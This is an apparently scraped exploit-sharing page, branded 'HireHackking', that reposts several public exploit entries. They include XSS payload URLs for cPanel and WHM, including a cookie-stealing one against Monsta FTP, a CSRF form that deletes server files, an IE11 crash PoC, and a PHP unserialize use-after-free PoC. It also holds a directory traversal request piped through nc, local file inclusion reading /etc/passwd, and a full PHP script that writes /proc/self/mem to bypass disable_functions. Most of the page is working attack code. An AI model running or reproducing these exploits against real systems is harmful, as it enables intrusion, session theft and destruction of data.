http://www.example.complugins/wp_rokbox/rokbox.php
HireHackking

cPanel - 'account' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/57045/info cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E
HireHackking

Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)

HACKER · %s · %s

<!-- # Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC # Date: 09.11.2015 # Vulnerable version: 11 (32bit version)(newest at the time 11.0.9600.17843 and 11.0.10240.16431) # Tested on: Windows 7 64bit and Windows 10(10240) 64bit # Author: Mjx # http://http://jinxin.pen.io/ --> <!doctype html> <html> <head> <meta http-equiv='Cache-Control' content='no-cache'/> <title>crash IE 11</title> <style></style> <script type='text/javascript' ></script> <script> function crash() { var id_0 = null; id_0 = document.createElement( 'THEAD' ); document.body.appendChild( id_0 ); elemTree = []; elemTree[0]= document.createElement('SELECT'); document.all[7].appendChild(elemTree[0]); elemTree[1]= document.createElement('B'); document.all[8].appendChild(elemTree[1]); elemTree[2]= document.createElement('SOURCE'); document.all[0].appendChild(elemTree[2]); elemTree[3]= document.createElement('HR'); document.all[8].appendChild(elemTree[3]); elemTree[3].setAttribute('hidden', -4400000000); elemTree[4]= document.createElement('SELECT'); document.all[9].appendChild(elemTree[4]); elemTree[5]= document.createElement('RUBY'); document.all[2].appendChild(elemTree[5]); elemTree[6]= document.createElement('OL'); document.all[4].appendChild(elemTree[6]); elemTree[7]= document.createElement('AREA'); document.all[6].appendChild(elemTree[7]); elemTree[8]= document.createElement('ARTICLE'); document.all[3].appendChild(elemTree[8]); elemTree[9]= document.createElement('TEXTAREA'); document.all[1].appendChild(elemTree[9]); txtRange = document.body.createTextRange(); txtRange.moveEnd('character', 14); txtRange.select(); txtRange.execCommand('insertUnorderedList',true,null); txtRange = document.body.createTextRange(); txtRange.moveEnd('sentence', 4); txtRange.select(); txtRange.execCommand('insertOrderedList',true,null); } </script> </head> <body onload='crash();'> </body> </html> <!-- (1428.1230): Stack overflow - code c00000fd (!!! second chance !!!) eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000 eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 verifier!AVrfpDphAllocateVm+0x9: 5fd166d9 50 push eax 0:008> kb ChildEBP RetAddr Args to Child 09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9 09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0 09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d 09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd 0:008> r eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000 eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 verifier!AVrfpDphAllocateVm+0x9: 5fd166d9 50 push eax 0:008> !vprot esp-4 BaseAddress: 09ab2000 AllocationBase: 09ab0000 AllocationProtect: 00000004 PAGE_READWRITE RegionSize: 001fe000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE -->
HireHackking

Monsta FTP 1.6.2 - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: CSRF XSS Monsta FTP # Google Dork: intitle: Monsta FTP CSRF / XSS # Date: 2015-09-11 # Exploit Author: hyp3rlinx # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.monstaftp.com # Software Link: www.monstaftp.com # Version: monsta_ftp_v1.6.2 # Tested on: windows 7 SP1 XAMPP # Category: WebApps Vendor: ================================ www.monstaftp.com Product: ================================ monsta_ftp_v1.6.2 Monsta FTP is open source PHP/Ajax cloudware browser based FTP file management web application. Vulnerability Type: =================== CSRF / XSS CVE Reference: ============== N/A Vulnerability Details: ===================== CSRF: ----- No CSRF token exists when making some POST requests, allowing arbitrary deletion of files on the monstaftp server dirs. XSS: ---- Monstaftp sanitizes most $_GET requests with call to sanitizeStr() e.g --> echo sanitizeStr($ftp_host), However we find vulnerable code that is not santized on line 494 of index.php ---> echo $_GET["openFolder"]; creating an XSS entry point and will execute when victim accesses the Monstaftp login page before logging in. Exploit code(s): =============== 1) CSRF delete all server files <body onLoad="doit()"> <script> function doit(){ var e=document.getElementById('HELL') e.submit() } <form id="HELL" action="http://localhost/monsta_ftp_v1.6.2_install/?" method="post"> <input type="text" id="ftpAction" name="ftpAction" value="delete"/> <input type="text" id="folderAction[]" name="folderAction[]" value=""/> <input type="text" id="fileAction[]" name="fileAction[]" value="~%2FSOMEFILES_TO_DELETE.php"/> </form> 2) XSS steal PHP session ID: e.g. "PHPSESSID=7lukgqaghuqihnbj3ikcrsc715" Logout, then access the following URL before login and BOOOOOOM!. http://localhost/monsta_ftp_v1.6.2_install/?openFolder="/><script>alert('XSS by hyp3rlinx '%2bdocument.cookie)</script> Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 11, 2015 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ========================================================= Med Description: ========================================================== Request Method(s): [+] POST & GET Vulnerable Product: [+] monsta_ftp_v1.6.2 Vulnerable Parameter(s): [+] ftpAction, fileAction[], openFolder Affected Area(s): [+] FTP Admin Area =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
HireHackking
source: https://www.securityfocus.com/bid/57055/info MotoCMS is prone to a file-disclosure and an arbitrary file-upload vulnerability. An attacker can exploit these issues to upload a file and view local files in the context of the web server process, which may aid in further attacks. MotoCMS 1.3.3 and prior versions are vulnerable. http://www.example.com/admin/data/users.xml
HireHackking

WHM - 'filtername' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/57061/info WHM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E
HireHackking
source: https://www.securityfocus.com/bid/57060/info cPanel and WHM are prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. cPanel 11.34.0 and WHM 11.34.0 are vulnerable; other versions may also be affected. http://www.example.com/frontend/x3/stats/detailbw.html?mon=Dec&year=2006&domain=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&target=x3demob
HireHackking

PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free

HACKER · %s · %s

Use After Free Vulnerabilities in unserialize() Taoguang Chen <[@chtg](http://github.com/chtg)> Write Date: 2015.7.31 Release Date: 2015.9.4 Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.12 Affected is PHP 5.5 < 5.5.28 Affected is PHP 5.4 < 5.4.44 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ if (ce->unserialize == NULL) { zend_error(E_WARNING, "Class %s has no unserializer", ZSTR_VAL(ce->name)); object_init_ex(rval, ce); } else if (ce->unserialize(rval, ce, (const unsigned char*)*p, datalen, (zend_unserialize_data *)var_hash) != SUCCESS) { return 0; } (*p) += datalen; return finish_nested_data(UNSERIALIZE_PASSTHRU); The unserialize() with Serializable class lead to various problems. i) Free the memory via crafted Serializable class <?php class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); $this->data = 1; } } ?> ii) Free the memory via the process_nested_data() with a invalid serialized string static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable *ht, long elements, int objprops) { while (elements-- > 0) { zval *key, *data, **old_data; ... ALLOC_INIT_ZVAL(data); if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) { zval_dtor(key); FREE_ZVAL(key); zval_dtor(data); FREE_ZVAL(data); <=== free the memory return 0; } iii) Free the memory via the var_push_dtor_no_addref() with the var_destroy(). PHPAPI void var_destroy(php_unserialize_data_t *var_hashx) { ... while (var_hash) { for (i = 0; i < var_hash->used_slots; i++) { zval_ptr_dtor(&var_hash->data[i]); <=== free the memory } ... PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER) { ... if (*rval != NULL) { var_push_dtor_no_addref(var_hash, rval); } *rval = *rval_ref; We can create ZVAL and free it via Serializable::unserialize. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43. <?php $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; // i) //$inner = 'a:1:{i:0;i:1;}'; //$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:3;}'; // ii) $inner = 'a:2:{i:0;i:1;i:1;i:2'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}'; // iii) //$inner = 'r:1;'; //$exploit = 'a:1:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = $fakezval.$i; } var_dump($data); function ptr2str($ptr) { $out = ""; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); // i) // $this->data = '1'; } } ?> Test the PoC on the command line: $ php uafpoc.php array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> int(1122334455) <=== so we can control the memory and create fake ZVAL :) }
HireHackking

Octogate UTM 3.0.12 - Admin Interface Directory Traversal

HACKER · %s · %s

# Exploit Title: Octogate UTM Admin Interface Directory Traversal # Date: 26.08.2015 # Software Link: http://www.octogate.com # Exploit Author: Oliver Karow # Contact: oliver.karow@gmx.de # Website: http://www.oliverkarow.de # Category: Remote Exploit Affected Products/Versions -------------------------- Product Name: Octogate Version: 3.0.12 - Virtual Appliance & Appliance Product/Company Information --------------------------- Octogate is a UTM Device, including the following features: Application Firewall, Intrusion Detection and -Prevention, Stateful- & Deep Packet Inspection, DoS- and DDoS protection and Reverse Proxy. Octogate IT Security Systems GmbH is based in Germany. Vulnerability Description ------------------------- Octogate UTM Device is managed via web interface. The download function for SSL-Certifcate and Documentation is accessable without authentication, and allows access to files outside of the web root via the script /scripts/download.php. Example request: echo -en "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer: http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80 Patch Information ----------------- Patch is available from vendor. Advisory Information -------------------- http://www.oliverkarow.de/research/octogate.txt
HireHackking
<?php // EDB Note: Paper https://www.exploit-db.com/docs/english/38104-shoot-zend_executor_globals-to-bypass-php-disable_functions.pdf error_reporting(0x66778899); set_time_limit(0x41424344); define('ZEND_INI_USER', (1<<0)); define('ZEND_INI_PERDIR', (1<<1)); define('ZEND_INI_SYSTEM', (1<<2)); /* 00df9000-00e16000 rw-p 00000000 00:00 0 017ff000-01a51000 rw-p 00000000 00:00 0 [heap] error_reporting(0x66778899); typedef struct bucket { ulong h; /\* Used for numeric indexing *\/ uint nKeyLength; void *pData; void *pDataPtr; struct bucket *pListNext; struct bucket *pListLast; struct bucket *pNext; struct bucket *pLast; const char *arKey; } Bucket; typedef struct _hashtable { uint nTableSize; uint nTableMask; uint nNumOfElements; ulong nNextFreeElement; Bucket *pInternalPointer; /\* Used for element traversal *\/ Bucket *pListHead; Bucket *pListTail; Bucket **arBuckets; dtor_func_t pDestructor; //pointer zend_bool persistent; unsigned char nApplyCount; zend_bool bApplyProtection; #if ZEND_DEBUG int inconsistent; #endif } HashTable; struct _zend_executor_globals { zval **return_value_ptr_ptr; zval uninitialized_zval; zval *uninitialized_zval_ptr; zval error_zval; zval *error_zval_ptr; zend_ptr_stack arg_types_stack; /\* symbol table cache *\/ HashTable *symtable_cache[SYMTABLE_CACHE_SIZE]; HashTable **symtable_cache_limit; HashTable **symtable_cache_ptr; zend_op **opline_ptr; HashTable *active_symbol_table; HashTable symbol_table; /\* main symbol table *\/ HashTable included_files; /\* files already included *\/ JMP_BUF *bailout; int error_reporting; int orig_error_reporting; int exit_status; zend_op_array *active_op_array; HashTable *function_table; /\* function symbol table *\/ HashTable *class_table; /\* class table *\/ HashTable *zend_constants; /\* constants table *\/ zend_class_entry *scope; zend_class_entry *called_scope; /\* Scope of the calling class *\/ zval *This; long precision; int ticks_count; //10*8 zend_bool in_execution; //typedef unsigned char zend_bool; HashTable *in_autoload; zend_function *autoload_func; zend_bool full_tables_cleanup; /\* for extended information support *\/ zend_bool no_extensions; #ifdef ZEND_WIN32 zend_bool timed_out; OSVERSIONINFOEX windows_version_info; #endif HashTable regular_list; HashTable persistent_list; zend_vm_stack argument_stack; int user_error_handler_error_reporting; zval *user_error_handler; zval *user_exception_handler; zend_stack user_error_handlers_error_reporting; zend_ptr_stack user_error_handlers; zend_ptr_stack user_exception_handlers; zend_error_handling_t error_handling; zend_class_entry *exception_class; /\* timeout support *\/ int timeout_seconds; int lambda_count; HashTable *ini_directives; HashTable *modified_ini_directives; zend_ini_entry *error_reporting_ini_entry; zend_objects_store objects_store; zval *exception, *prev_exception; zend_op *opline_before_exception; zend_op exception_op[3]; struct _zend_execute_data *current_execute_data; struct _zend_module_entry *current_module; zend_property_info std_property_info; zend_bool active; zend_op *start_op; void *saved_fpu_cw_ptr; #if XPFPA_HAVE_CW XPFPA_CW_DATATYPE saved_fpu_cw; #endif void *reserved[ZEND_MAX_RESERVED_RESOURCES]; }; /* struct _zend_ini_entry { int module_number; int modifiable; char *name; uint name_length; ZEND_INI_MH((*on_modify)); void *mh_arg1; void *mh_arg2; void *mh_arg3; char *value; .... */ //echo file_get_contents("/proc/self/maps"); $mem = fopen("/proc/self/mem", "rb"); /* ylbhz@ylbhz-Aspire-5750G:/tmp$ php -r "echo file_get_contents('/proc/self/maps');" 00400000-00bf3000 r-xp 00000000 08:01 4997702 /usr/bin/php5 00df3000-00e94000 r--p 007f3000 08:01 4997702 /usr/bin/php5 00e94000-00ea1000 rw-p 00894000 08:01 4997702 /usr/bin/php5 00ea1000-00ebe000 rw-p 00000000 00:00 0 0278f000-02a65000 rw-p 00000000 00:00 0 [heap] */ //set the extension_dir fseek($mem, 0x00ea1000); for($i = 0;$i < 0x00ebe000 - 0x00ea1000;$i += 4) { //echo 'x'; $num = unp(fread($mem, 4)); if($num == 0x66778899) { $offset = 0x00ea1000 + $i; printf("got noe, offset is:0x%x\r\n", $offset); printf("Now set error_reporting to 0x55667788 and reread the value\r\n"); error_reporting(0x55667788); fseek($mem, $offset); $num = unp(fread($mem, 4)); printf("The value is %x\r\n", $num); if($num == 0x55667788) { printf("I found the offset of executor_globals's member error_reporting\r\n"); printf("read the structure\r\n"); fseek($mem, $offset); fseek($mem, $offset + 392 - 8); //seek to int timeout_seconds member $timeout = dump_value($mem, 4); if($timeout == 0x41424344) { error_reporting(E_ALL); //restore the error reporting printf("I found the timeout_seconds I seted:0x%08x\r\n", $timeout); dump_value($mem, 4); $ini_dir = dump_value($mem, 8); printf("ini_directives address maybe in 0x%016x\r\n", $ini_dir); fseek($mem, $ini_dir + 48); //seek to Bucket **arBuckets; $arBucket = dump_value($mem, 8); printf("Bucket **arBuckets address maybe in 0x%016x\r\n", $arBucket); fseek($mem, $arBucket); //try to get the first Bucket address for($i = 0;$i < 1000;$i ++) { $bucket = dump_value($mem, 8); //printf("This bucket address maybe in 0x%016x\r\n", $bucket); fseek($mem, $bucket + 16); //seek to const void *pData; in struct Bucket $pdata = dump_value($mem, 8); dump_value($mem, 8); //printf("This pData address maybe in 0x%016x\r\n", $pdata); fseek($mem, $pdata + 8); //seek to char* name; $name = dump_value($mem, 8); $name_t = dump_value($mem, 4); //printf("This char name* address maybe in 0x%016x, length:%d\r\n", $name, $name_t); fseek($mem, $name); $strname = fread($mem, $name_t); if(strlen($strname) == 0) break; //printf("ini key:%s\r\n", $strname); if(strncmp($strname, 'extension_dir', 13) == 0) { printf("I found the extension_dir offset!\r\n"); printf("try to set extension_dir value /tmp by ini_set\r\n"); ini_set('extension_dir', '/tmp'); printf("try to get extension_dir value by ini_get\r\n"); var_dump(ini_get('extension_dir')); // write string value fseek($mem, $pdata + 56); //seek to char* value; $value = dump_value($mem, 8); $value_t = dump_value($mem, 4); printf("This char value* address maybe in 0x%016x, length:%d\r\n", $value, $value_t); // write data part $mem_w = fopen("/proc/self/mem", "wb"); fseek($mem_w, $value); fwrite($mem_w, "/tmp\0", 5); //write /tmp value printf("retry to get extension_dir value!!!!\r\n"); var_dump(ini_get('extension_dir')); error_reporting(0x66778899); break; } //seek to struct bucket *pListNext; ready to read next bucket's address fseek($mem, $bucket + 32 + 8);//struct bucket *pListLast; it's so strage! } } } else { printf("now here, restore the value\r\n"); error_reporting(0x66778899); } } } //set the enable_dl fseek($mem, 0x00ea1000); for($i = 0;$i < 0x00ebe000 - 0x00ea1000;$i += 4) { $num = unp(fread($mem, 4)); if($num == 0x66778899) { $offset = 0x00ea1000 + $i; printf("got noe, offset is:0x%x\r\n", $offset); printf("Now set error_reporting to 0x55667788 and reread the value\r\n"); error_reporting(0x55667788); fseek($mem, $offset); $num = unp(fread($mem, 4)); printf("The value is %x\r\n", $num); if($num == 0x55667788) { printf("I found the offset of executor_globals's member error_reporting\r\n"); printf("read the structure\r\n"); fseek($mem, $offset); fseek($mem, $offset + 392 - 8); //seek to int timeout_seconds member $timeout = dump_value($mem, 4); if($timeout == 0x41424344) { error_reporting(E_ALL); //restore the error reporting printf("I found the timeout_seconds I seted:0x%08x\r\n", $timeout); dump_value($mem, 4); $ini_dir = dump_value($mem, 8); printf("ini_directives address maybe in 0x%016x\r\n", $ini_dir); fseek($mem, $ini_dir + 48); //seek to Bucket **arBuckets; $arBucket = dump_value($mem, 8); printf("Bucket **arBuckets address maybe in 0x%016x\r\n", $arBucket); fseek($mem, $arBucket); //try to get the first Bucket address for($i = 0;$i < 1000;$i ++) { $bucket = dump_value($mem, 8); //printf("This bucket address maybe in 0x%016x\r\n", $bucket); fseek($mem, $bucket + 16); //seek to const void *pData; in struct Bucket $pdata = dump_value($mem, 8); dump_value($mem, 8); //printf("This pData address maybe in 0x%016x\r\n", $pdata); fseek($mem, $pdata + 8); //seek to char* name; $name = dump_value($mem, 8); $name_t = dump_value($mem, 4); //printf("This char name* address maybe in 0x%016x, length:%d\r\n", $name, $name_t); fseek($mem, $name); $strname = fread($mem, $name_t); if(strlen($strname) == 0) break; //printf("ini key:%s\r\n", $strname); if(strncmp($strname, 'enable_dl', 9) == 0) { printf("I found the enable_dl offset!\r\n"); printf("try to set enable_dl value true by ini_set\r\n"); ini_set('enable_dl', true); printf("try to get enable_dl value by ini_get\r\n"); var_dump(ini_get('enable_dl')); printf("try to run dl() function\r\n"); dl('not_exists'); printf("try to modifiy the modifiable member in memory!\r\n"); fseek($mem, $pdata + 4); $modifiable = dump_value($mem, 4); printf("org modifiable value is %x\r\n", $modifiable); $mem_w = fopen("/proc/self/mem", "wb"); fseek($mem_w, $pdata + 4); //seek to modifiable fwrite($mem_w, packli(7)); //check fseek($mem, $pdata + 4); $modifiable = dump_value($mem, 4); printf("now modifiable value is %x\r\n", $modifiable); printf("try ini_set enable_dl agen!!!!\r\n"); ini_set('enable_dl', true); printf("now enable_dl seting is\r\n"); var_dump(ini_get('enable_dl')); printf("retry the dl() function!!!!\r\n"); ini_set('extension_dir', '/tmp'); dl('not_exists'); exit(0); } //seek to struct bucket *pListNext; ready to read next bucket's address fseek($mem, $bucket + 32 + 8);//struct bucket *pListLast; it's so strage! } } } else { printf("now here, restore the value\r\n"); error_reporting(0x66778899); } } } function unp($value) { return hexdec(bin2hex(strrev($value))); } function dump_value($dh, $flag) { switch($flag) { case 4: return unp(fread($dh, 4)); case 8: return unp(fread($dh, 8)); } } function packlli($value) { $higher = ($value & 0xffffffff00000000) >> 32; $lower = $value & 0x00000000ffffffff; return pack('V2', $lower, $higher); } function packli($value) { return pack('V', $value); } /* ylbhz@ylbhz-Aspire-5750G:/tmp$ php php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php got noe, offset is:0xebd180 Now set error_reporting to 0x55667788 and reread the value The value is 55667788 I found the offset of executor_globals's member error_reporting read the structure I found the timeout_seconds I seted:0x41424344 ini_directives address maybe in 0x00000000024983c0 Bucket **arBuckets address maybe in 0x00000000026171e0 I found the extension_dir offset! try to set extension_dir value /tmp by ini_set try to get extension_dir value by ini_get string(22) "/usr/lib/php5/20121212" This char value* address maybe in 0x0000000000b5ea53, length:22 retry to get extension_dir value!!!! string(4) "/tmp" got noe, offset is:0xebd180 Now set error_reporting to 0x55667788 and reread the value The value is 55667788 I found the offset of executor_globals's member error_reporting read the structure I found the timeout_seconds I seted:0x41424344 ini_directives address maybe in 0x00000000024983c0 Bucket **arBuckets address maybe in 0x00000000026171e0 I found the enable_dl offset! try to set enable_dl value true by ini_set try to get enable_dl value by ini_get string(0) "" try to run dl() function PHP Warning: dl(): Dynamically loaded extensions aren't enabled in /tmp/php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php on line 326 try to modifiy the modifiable member in memory! org modifiable value is 4 now modifiable value is 7 try ini_set enable_dl agen!!!! now enable_dl seting is string(1) "1" retry the dl() function!!!! PHP Warning: dl(): Unable to load dynamic library '/tmp/not_exists' - /tmp/not_exists: cannot open shared object file: No such file or directory in /tmp/php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php on line 345 ylbhz@ylbhz-Aspire-5750G:/tmp$ ylbhz@ylbhz-Aspire-5750G:/tmp$ php -v PHP 5.5.9-1ubuntu4.9 (cli) (built: Apr 17 2015 11:44:57) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies ylbhz@ylbhz-Aspire-5750G:/tmp$ uname -a Linux ylbhz-Aspire-5750G 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux */ ?>
HireHackking
source: https://www.securityfocus.com/bid/56994/info ZT Autolinks Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. http://www.example.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00